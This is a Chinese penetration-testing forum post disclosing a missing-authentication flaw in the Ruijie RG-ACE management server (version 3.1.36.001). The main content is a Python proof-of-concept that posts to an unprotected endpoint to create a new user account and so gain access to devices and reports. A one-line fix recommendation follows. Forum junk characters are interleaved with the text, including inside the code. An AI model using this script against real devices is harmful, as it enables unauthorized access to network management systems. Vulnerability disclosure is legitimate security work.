中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
) e1 p4 z( e2 G
# q& ~! D2 n/ b, I# Z$ r) w: T: w# `
5 I; ^$ Q: Y, V- W' ~$ ~测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
. P/ m5 J, b# K9 D7 p

漏洞证明：



+ @' m, [! v" ~+ B
) h0 p5 C1 v- _: g$ h* q( r1 G
% ]4 U4 H% I' [% c
执行脚本
#! /usr/bin/env python
5 b8 X9 {  p5 Q9 a# \) B7 `#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
* i7 l* m- X, J( l4 F7 g# J7 Jimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
5 f1 E/ A) I' r4 M$ qopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
: i4 O: B  z; Ipost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
+ _3 D2 d) h2 t) q# Z# p("useropermanager","userManager"),
("userName","t"), #######账号自己加
5 s! y. V8 F* |# i* o! r6 u) R("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
7 O$ r( U2 N$ z6 m( v  j("mobilePhone",""),
  ?0 g/ `4 k1 G6 @) \6 v: m9 G("officePhone",""),
7 Z# r$ K! T* ]$ ~; i("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
4 v0 O0 j/ R4 `: Pp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

& R" Q' ^( c8 z2 t8 j6 A/ T登录，连接设备
1 c+ i' @1 q; f

8 _$ j* g! R* D; V5 \; a& F
$ X3 |1 Y8 l0 M
9 N+ ]& z# |$ y, K) M
9 T9 M* v  [6 t4 q. _默认的管理员admin权限更大点

* g* R" a0 X' h


  d5 E3 ~) x7 e" k
# K/ \! f2 N( S* D2 [修复方案：
加强对接口的权限验证

' B7 O" H( f7 @

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2